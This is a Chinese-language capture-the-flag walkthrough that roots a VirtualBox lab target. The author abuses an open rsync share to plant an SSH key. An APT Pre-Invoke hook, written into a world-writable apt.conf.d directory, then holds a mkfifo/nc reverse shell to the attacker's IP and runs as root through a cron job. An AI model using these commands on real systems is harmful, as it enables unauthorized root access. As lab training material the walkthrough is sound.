难度:easy
kali:192.168.56.104
靶机:192.168.56.195
> arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:05 (Unknown: locally administered)
192.168.56.100 08:00:27:3d:d3:11 PCS Systemtechnik GmbH
192.168.56.195 08:00:27:da:3d:65 PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.930 seconds (132.64 hosts/sec). 3 responded端口扫描
> nmap 192.168.56.195
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-13 17:08 CST
Nmap scan report for 192.168.56.195
Host is up (0.0072s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
873/tcp open rsync
MAC Address: 08:00:27:DA:3D:65 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.17 secondsrsync远程连接
并不知道rsync服务是什么,经过搜索引擎知道rsync是一个强大且高效的文件同步和备份工具,用于在本地和远程系统之间同步文件和目录。rsync 支持增量传输、压缩传输和排除特定文件等功能。rsync 服务(通常通过 rsync 守护进程实现)可以使文件同步过程更加自动化和灵活。
通过描述可以猜测这个服务可以文件传输,查询一下连接这个服务的指令
> rsync rsync://192.168.56.195
share wally (home)
> rsync rsync://192.168.56.195/share/
drwx------ 4,096 2024/07/13 17:11:09 .
lrwxrwxrwx 9 2023/04/23 15:34:26 .bash_history
-rw------- 220 2023/01/15 20:58:06 .bash_logout
-rw------- 3,526 2023/01/15 20:58:06 .bashrc
-rw------- 807 2023/01/15 20:58:06 .profile
-r-------- 33 2024/07/11 23:34:21 user.txt
drwx------ 4,096 2024/07/13 16:32:43 .gnupg
drwxr-xr-x 4,096 2023/04/29 21:50:29 .local拿到一个wally用户,先读一下flag
> rsync rsync://192.168.56.195/share/user.txt .
> cat user.txt
9e1d45e31***********8760d2108查了一下,还能写入文件,写个公钥进去
/tmp root@kali2 19:42:32
> mkdir .ssh
/tmp root@kali2 19:42:35
> cp /root/.ssh/id_rsa .ssh/
/tmp root@kali2 19:42:56
> cp /root/.ssh/id_rsa.pub .ssh/authorized_keys
/tmp root@kali2 19:43:25
> rsync -avz .ssh rsync://192.168.56.195/share/
sending incremental file list
.ssh/
.ssh/authorized_keys
.ssh/id_rsa
sent 2,929 bytes received 58 bytes 5,974.00 bytes/sec
total size is 4,150 speedup is 1.39
/tmp root@kali2 19:43:52
> ssh -i id_rsa wally@192.168.56.195
Warning: Identity file id_rsa not accessible: No such file or directory.
Enter passphrase for key '/root/.ssh/id_rsa':
wally@send:~$ id
uid=1000(wally) gid=1000(wally) grupos=1000(wally)提权
sudo
wally@send:~$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for wally:
sudo: a password is required没有
SUID
wally@send:~$ find / -perm -4000 2>/dev/null
/usr/bin/mount
/usr/bin/su
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper没有
传个pspy64分析一下
发现了一个定时任务/usr/bin/apt-get update
2024/07/13 13:47:39 CMD: UID=0 PID=12230 | /usr/bin/apt-get update
2024/07/13 13:47:39 CMD: UID=0 PID=12227 | /usr/bin/apt-get update
2024/07/13 13:47:39 CMD: UID=0 PID=12226 | /bin/sh -c /usr/bin/apt-get update
2024/07/13 13:47:39 CMD: UID=0 PID=12225 | /usr/sbin/CRON -f
2024/07/13 13:47:39 CMD: UID=0 PID=12 |
2024/07/13 13:47:39 CMD: UID=0 PID=110 |
2024/07/13 13:47:39 CMD: UID=0 PID=11 |
2024/07/13 13:47:39 CMD: UID=0 PID=109 |
2024/07/13 13:47:39 CMD: UID=0 PID=108 |
2024/07/13 13:47:39 CMD: UID=0 PID=107 |
2024/07/13 13:47:39 CMD: UID=0 PID=106 |
2024/07/13 13:47:39 CMD: UID=0 PID=105 |
2024/07/13 13:47:39 CMD: UID=0 PID=103 |
2024/07/13 13:47:39 CMD: UID=0 PID=10 |
2024/07/13 13:47:39 CMD: UID=0 PID=1 | /sbin/init
2024/07/13 13:48:01 CMD: UID=0 PID=13390 | /usr/sbin/CRON -f
2024/07/13 13:48:01 CMD: UID=0 PID=13391 | /usr/sbin/CRON -f
2024/07/13 13:48:01 CMD: UID=0 PID=13392 | /bin/sh -c /usr/bin/apt-get update
2024/07/13 13:48:02 CMD: UID=0 PID=13393 | /usr/bin/apt-get update
2024/07/13 13:48:02 CMD: UID=0 PID=13394 | /usr/bin/apt-get update
2024/07/13 13:48:02 CMD: UID=0 PID=13395 | /usr/bin/apt-get update 传入linpeas.sh分析
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/etc/apt/apt.conf.d
/home/wally
/run/lock
/run/user/1000
/run/user/1000/gnupg
/run/user/1000/systemd
/run/user/1000/systemd/inaccessible
/run/user/1000/systemd/inaccessible/dir
/run/user/1000/systemd/inaccessible/reg
/run/user/1000/systemd/units
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/index.html
/tmp/index.html.1
/tmp/.Test-unix
#)You_can_write_even_more_files_inside_last_directory
/var/lib/php/sessions
/var/tmp发现/etc/apt/apt.conf.d目录可写,真好结合定时任务apt-get update,写个配置文件让定时任务执行的时候执行里面的配置文件
wally@send:~$ echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.104 4567 >/tmp/f"};' > /etc/apt/apt.conf.d/tao具体可参考https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation/
然后靶机监听就能拿到rootshell了
> nc -lvnp 4567
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.195] 44056
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) grupos=0(root)